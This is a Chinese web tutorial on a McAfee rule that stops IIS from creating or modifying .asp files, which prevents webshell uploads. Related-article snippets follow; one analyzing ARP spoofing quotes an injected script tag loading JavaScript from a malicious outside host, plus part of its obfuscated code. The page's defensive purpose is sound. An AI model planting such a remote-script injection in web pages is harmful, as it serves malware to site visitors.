让MCAFEE来终结网站被黑的时代-终极版图文

今天查看MCAFEE的日志时偶然发现,可以只阻挡IIS进程创建和修改ASP文件(本文以ASP文件为例,其他程序设置方法基本相同),这样我们用其他方法(比如直接在服务器上修改、通过FTP修改……)修改ASP文件就不会受影响。这样,这个规则再拦截非法操作的同时还不影响正常使用。规则见图:

这样,就在不影响正常使用的情况下断绝了黑客上传木马干坏事的可能。这个方法可以给任何人使用,也适合主机商装给自己虚拟主机的服务器,保证服务器上用户的网站安全。

基本上来说,这样设置之后即使是网站有任何漏洞,网站也不会被上传木马挂上非法代码、或者网站被删除、修改。

需要注意的一点:因本规则将阻止IIS进程对任何.asp文件的修改,因此如果你的网站使用的是ACCESS数据库,请使用本规则后将数据库修改为其他后缀名。

如果你是主机商,这样设置之后你需要告知你的用户不能将数据库后缀改成ASP。否则数据库将不可写。

(0)

相关推荐

  • 让MCAFEE来终结网站被黑的时代-终极版图文

    让MCAFEE来终结网站被黑的时代-终极版图文

    今天查看MCAFEE的日志时偶然发现,可以只阻挡IIS进程创建和修改ASP文件(本文以ASP文件为例,其他程序设置方法基本相同),这样我们用其他方法(比如直接在服务器上修改.通过FTP修改--)修改ASP文件就不会受影响.这样,这个规则再拦截非法操作的同时还不影响正常使用.规则见图: 这样,就在不影响正常使用的情况下断绝了黑客上传木马干坏事的可能.这个方法可以给任何人使用,也适合主机商装给自己虚拟主机的服务器,保证服务器上用户的网站安全. 基本上来说,这样设置之后即使是网站有任何漏洞,网站也不会

  • 让McAfee来终结网站被挂马的时代图文教程

    让McAfee来终结网站被挂马的时代图文教程

    很多站长因为使用网上不常见的程序,有漏洞得不到补丁:而自己又没有编程能力无法修复或者干脆不知道漏洞在那里,被挂马后恢复程序结果不久又被挂--还有很多人即使使用的是应用比较广泛的程序,但也可能因为没及时打上补丁或出了漏洞官方还未发现而被挂马. 老是被挂也不是个事.怎么才能彻底杜绝被挂马呢?让程序完美,没有任何漏洞?这个可能性好象接近于0.我们只能从其他的地方想办法. 首先来看一下马是怎么挂上去的.首先,"黑客"会找到一个漏洞,然后利用这个漏洞上传一个后门程序上去以取得WEBSHELL,这

  • 您用户网站被黑的原因和解决办法

    您的用户网站被黑,有以下几种原因造成的: 1. 是您的客户的网站代码有问题,存在安全漏洞造成的. 如果您的服务器上大部分用户的网站都正常,只有少量用户网站被黑,那  么就很可能是您少量用户网站被黑的网站代码有问题,存在安全漏洞造  成的.造成这个问题是没有办法解决,也不是您的责任. 分析说明: 1). 大家都知道,"虚拟主机提供商"对自己的每个虚拟主机用户  都分配了FSO文件操作的权限,他们通过您分配的合法权限,可  以任意改动和上传的任何文件.如果您的用户没有保护好您分  配给他们

  • 网站被黑的假象--ARP欺骗之页面中加入一段js

    昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码.刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹. <script src=http://fuck.ns2go.com/dir/index_pic/1.js></script> 于是只能从这段代码入手,我下载这个js开发发现是下面一段代码: 复制代码 代码如下: window["\x64\x6f\x63\x75\x6d\x65\x6e\x

  • 用户网站被黑,您的服务器是否安全?

    以下文章为星外科技版权所有,有少量用户一遇到网站被黑,就马上认为是星外平台造成的.这是一种误解. 因为如果是客户的网站代码有问题,星外的平台是无法解决的,谁也帮不了这个用户.这是因为,黑客利用用户网站的漏洞,使用合法代码来修改用户网页,造成了网页被插入代码,这种情况谁也无法防止.因为木马变种太多,很多是用合法操作的.正如您把钥匙给了别人来开您自己的门是一样的道理.例如洞网的漏洞使用的就是合法的代码入侵,这种情况是任何人都无法防止,但是平台可以保证只影响单个网站,不影响整台服务器. 您的服务器是否

  • 网站被黑后处理方法及删除批量恶意代码的方法步骤

    如果发现网站出现异常情况,如页面被修改.管理账号不能登录,则说明网站已经被入侵.这时就需要尽快进行处理,以防止黑客种植的网页病毒扩散. 暂时关闭网站 网站被黑客入侵后,最常见的情况就是被植入木马程序,为了保证浏览者的安全,必须先关闭网站,待处理完毕后再开放.关闭时可以暂时将域名转向其它地址,如建立一个网站的帖吧,或者放置一个说明页面. 使用备份恢复 如果网站文件被黑客破坏或删除,假如事先进行过网站数据备份的话,可以直接使用备份文件恢复.万一没有对备份进行备份,而数据又非常重要的话,建议先不要进行

  • 网站被黑后的处理方法及批量删除恶意代码

    如果发现网站出现异常情况,如页面被修改.管理账号不能登录,则说明网站已经被入侵.这时就需要尽快进行处理,以防止黑客种植的网页病毒扩散. 暂时关闭网站 网站被黑客入侵后,最常见的情况就是被植入木马程序,为了保证浏览者的安全,必须先关闭网站,待处理完毕后再开放.关闭时可以暂时将域名转向其它地址,如建立一个网站的帖吧,或者放置一个说明页面. 使用备份恢复 如果网站文件被黑客破坏或删除,假如事先进行过网站数据备份的话,可以直接使用备份文件恢复.万一没有对备份进行备份,而数据又非常重要的话,建议先不要进行

  • 阿里云盾网站安全防御(WAF)的使用方法(图文)

    阿里云盾网站安全防御(WAF)的使用方法(图文)

    将2个网站搬到阿里云,一个是因为阿里云稳定,另一个就是牛逼轰轰的云盾了.之前在博客联盟群里模拟CC攻击过搭建在阿里云ECS上的博客,结果云盾毫无反应,而网站已经挂了. 这次特意细看了一下云盾上的CC防护功能,发现有部分朋友估计并未正确使用WAF.所以,我在本文就简单的分享一下阿里云盾-WAF网站防御的正确使用方法. 一.域名解析 大部分朋友,只是开启了云盾就不管了,这也就是很多朋友受到CC攻击后,云盾却毫无反应的原因了.实际上WAF防御必须配合域名解析来使用. 阿里云的WAF网站防御实际上相当于

  • seo下49个影响网站排名的因素完整总结版

    内部因素 URL中出现关键词  网页Title中出现关键词  常规内容中出现关键词  在页面的第一段中出现关键词  在页面的最后一段中出现关键词  Heading 标签 比如h1,h2中出现关键词  站内的链接中出现关键词  导向相关内容的导出链接  导出链接中出现关键词   图片文件名中出现关键词  Alt标签中出现关键词  comment中出现关键词  合理的频率更新内容  内容对搜索引擎的展示位置  网站结构循环PR,而非散发PR  关键词进行适当的修饰(加粗.斜体等) 外部因素 大量的导

  • 让你的网站可编辑的实现js代码

    非常的简单 一.打开你要黑的网站, 二.在浏览器的地址栏里输入: 复制代码 代码如下: javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 三.现在你会发现他的页面竟然可以任由你自由修改了!! 四.按照你自己的意图修改好后,在地址栏中输入: 复制代码 代码如下: javascript:document.body.contentEditable='false'; void 0 好了,截图

随机推荐